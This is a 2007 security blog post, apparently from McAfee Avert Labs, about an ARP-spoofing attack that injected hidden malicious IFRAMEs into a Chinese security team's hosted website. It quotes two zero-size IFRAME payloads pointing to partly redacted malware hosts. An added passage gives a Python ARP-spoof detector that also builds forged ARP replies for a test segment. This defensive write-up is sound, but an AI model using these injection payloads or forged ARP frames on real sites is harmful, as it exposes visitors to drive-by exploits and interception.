
ARP Spoofing: Is Your Web Hosting Service Protected?

Thursday, October 4, 2007 at 6:45am by Geok Meng Ong

Over the last couple of months, we have discussed several times how public and commercial web hosting services can be abused to host malware and exploits and to send spam.

This week was the “golden week” holiday season in China, and attackers decided that this was a good opportunity to catch administrators off guard. The Chinese Internet Security Response Team (C.I.S.R.T.) announced in their blog on Tuesday, October 2nd, that malicious IFRAMEs had been inserted into several of their web pages. McAfee Avert Labs got in touch with C.I.S.R.T. researchers quickly to understand the impact and the method of intrusion.

According to C.I.S.R.T.’s own investigations, it was an ARP poisoning attack originating from the web service provider’s network. And you guessed it, the web service engineers are away for the week.

ARP poisoning is a man-in-the-middle attack. The attacker sends forged ARP replies so that the gateway and the web servers each learn the attacker’s MAC address for the other’s IP address; traffic between them then flows through the attacker’s machine, which rewrites the HTTP responses in transit. The files on the web server are never touched, so the injected content is visible to visitors but not to an administrator inspecting the document root. On the C.I.S.R.T. website, the following malicious IFRAME was inserted into existing web pages:

<iframe src=http://mms.n{blocked}mn.com/{blocked}.htm width=0 height=0 frameborder=0></iframe>

In our research, we found at least two vulnerabilities targeted by the obfuscated exploits inserted into the web pages: Exploit-MS06-014 and Exploit-BaoFeng.a. Both vulnerabilities had already been patched by their respective vendors; the latter affects a popular Chinese media player. A quick check of several other virtual hosts at the same provider turned up at least one more website injected with malicious links:

<iframe src=http://kiss99.{blocked}.net width=0 height=0></iframe>

ARP poisoning is old school, but it can still be deadly in a virtual-domain hosting environment: because every virtual host behind the same gateway shares one layer-2 segment, a single compromised machine in the provider’s network can inject content into every site served from that segment, as seen in some instances of the HTool-MPack attack, which affected thousands of websites. Zhu Cheng, a colleague and researcher in McAfee Avert Labs, describes in his blog how web page code injection is achievable via ARP spoofing. Trojan tool kits such as NetSniff have this functionality built in, making it easy for attackers to perform. On the other hand, it is a “noisy” technique: spoofed ARP replies are easy to detect on the wire, because the gateway’s IP address suddenly starts being claimed by a second MAC address, and the redirection can be prevented altogether with static ARP entries on both the hosts and the gateway, or with ARP inspection on the switch.
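The “noisy on the wire” point above, as an added example that is not from the post or from McAfee: a small Python detector in the style of arpwatch that parses raw Ethernet/ARP frames, learns which MAC address each IP claims, and alerts when the gateway’s binding changes or when the ARP sender hardware address disagrees with the Ethernet source address. The IP addresses, MACs and frames below are constructed for this example, not taken from the C.I.S.R.T. incident, and the names `ArpWatch`, `build_arp`, `parse_arp` and `run_sample` are my own.

```python
"""Detect ARP spoofing from raw Ethernet/ARP frames (added example).

Tracks the MAC each IP on the segment claims and alerts when a binding
changes (especially the gateway's) or when the ARP sender hardware address
does not match the Ethernet source.  All addresses and frames are constructed
for this example; they are not captures from the incident in the post.
"""
import socket
import struct
from typing import Dict, List, Optional

ETHERTYPE_ARP = 0x0806
ARP_REQUEST = 1
ARP_REPLY = 2


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_arp(eth_src: str, eth_dst: str, oper: int,
              sha: str, spa: str, tha: str, tpa: str) -> bytes:
    """Build an Ethernet II frame carrying an IPv4-over-Ethernet ARP packet."""
    eth = mac_bytes(eth_dst) + mac_bytes(eth_src) + struct.pack("!H", ETHERTYPE_ARP)
    # htype=Ethernet(1), ptype=IPv4(0x0800), hlen=6, plen=4, then the operation
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, oper)
    arp += mac_bytes(sha) + socket.inet_aton(spa) + mac_bytes(tha) + socket.inet_aton(tpa)
    return eth + arp


def parse_arp(frame: bytes) -> Optional[dict]:
    """Return the ARP fields of a frame, or None if it is not IPv4/Ethernet ARP."""
    if len(frame) < 42:  # 14-byte Ethernet header + 28-byte ARP packet
        return None
    if struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, oper = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {
        "eth_src": mac_str(frame[6:12]),
        "oper": oper,
        "sha": mac_str(frame[22:28]),
        "spa": socket.inet_ntoa(frame[28:32]),
        "tha": mac_str(frame[32:38]),
        "tpa": socket.inet_ntoa(frame[38:42]),
    }


class ArpWatch:
    """Stateful IP-to-MAC tracker; seed it with known-good bindings if you have them."""

    def __init__(self, gateway_ip: str, known: Optional[Dict[str, str]] = None) -> None:
        self.gateway_ip = gateway_ip
        self.bindings: Dict[str, str] = dict(known or {})  # IP -> MAC first seen

    def observe(self, frame: bytes) -> List[str]:
        p = parse_arp(frame)
        if p is None:
            return []
        alerts: List[str] = []
        # A real stack sends ARP with sender MAC == Ethernet source; spoofing
        # tools that randomise the layer-2 source leave this inconsistency.
        if p["sha"] != p["eth_src"]:
            alerts.append(f"sender MAC {p['sha']} != Ethernet source {p['eth_src']} for {p['spa']}")
        # Requests and replies both carry the sender's own binding, so learn from either.
        known = self.bindings.get(p["spa"])
        if known is None:
            self.bindings[p["spa"]] = p["sha"]
        elif known != p["sha"]:
            who = "GATEWAY " if p["spa"] == self.gateway_ip else ""
            alerts.append(f"{who}{p['spa']} changed from {known} to {p['sha']}")
        return alerts


# Constructed sample segment (not real addresses from the incident).
GATEWAY_IP, GATEWAY_MAC = "10.0.0.1", "00:11:22:33:44:01"
SERVER_IP, SERVER_MAC = "10.0.0.10", "00:11:22:33:44:0a"
ATTACKER_MAC = "de:ad:be:ef:00:66"


def run_sample() -> List[List[str]]:
    """Replay four constructed frames and return the alerts raised for each."""
    frames = [
        # Normal exchange: gateway answers the server, then the server answers the gateway.
        build_arp(GATEWAY_MAC, SERVER_MAC, ARP_REPLY, GATEWAY_MAC, GATEWAY_IP, SERVER_MAC, SERVER_IP),
        build_arp(SERVER_MAC, GATEWAY_MAC, ARP_REPLY, SERVER_MAC, SERVER_IP, GATEWAY_MAC, GATEWAY_IP),
        # Attacker tells the server that the gateway now lives at the attacker's MAC.
        build_arp(ATTACKER_MAC, SERVER_MAC, ARP_REPLY, ATTACKER_MAC, GATEWAY_IP, SERVER_MAC, SERVER_IP),
        # Attacker tells the gateway the same about the server, from a randomised source MAC.
        build_arp("02:00:00:00:00:01", GATEWAY_MAC, ARP_REPLY, ATTACKER_MAC, SERVER_IP, GATEWAY_MAC, GATEWAY_IP),
    ]
    watch = ArpWatch(GATEWAY_IP)
    return [watch.observe(f) for f in frames]


if __name__ == "__main__":
    for i, alerts in enumerate(run_sample(), 1):
        print(f"frame {i}: {'ok' if not alerts else '; '.join(alerts)}")
```

In production you would feed `observe()` from a raw socket or a pcap reader instead of constructed frames, seed `ArpWatch` with the gateway’s real MAC so the very first forged reply is caught, and rate-limit on flapping rather than alerting on every change, since a legitimate NIC swap or failover also moves an IP to a new MAC once.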

If you had planned to review your website’s security and discuss it with your service provider, now might be a good time.



Comments (4)

  • Web hosting (استضافة مواقع) December 29, 2007 7:55AM

    ARP Spoofing: Is Your Web Hosting Service Protected?
    the web service engineers are away for the week.

  • Know Your Enemy: Behind the Scenes of Malicious Web Servers December 3, 2007 12:59AM

    [...] performs man-in-the-middle attacks, such as ARP spoofing 11, to include the malicious content. In the case of ARP spoofing, the administrator of the web page cannot find any direct evidence of malicious pages on the web site, but users are attacked nevertheless.[...]

  • Attack on a Chinese security organisation’s site abuses a web hosting service October 6, 2007 10:32PM

    [...] McAfee worked with C.I.S.R.T. researchers to investigate the method of intrusion, among other things [...]

  • Carlyle October 4, 2007 7:02PM

    Security seems to be the most haunting issue nowadays so far as web hosting service is concerned. Your article is really informative. Thanks.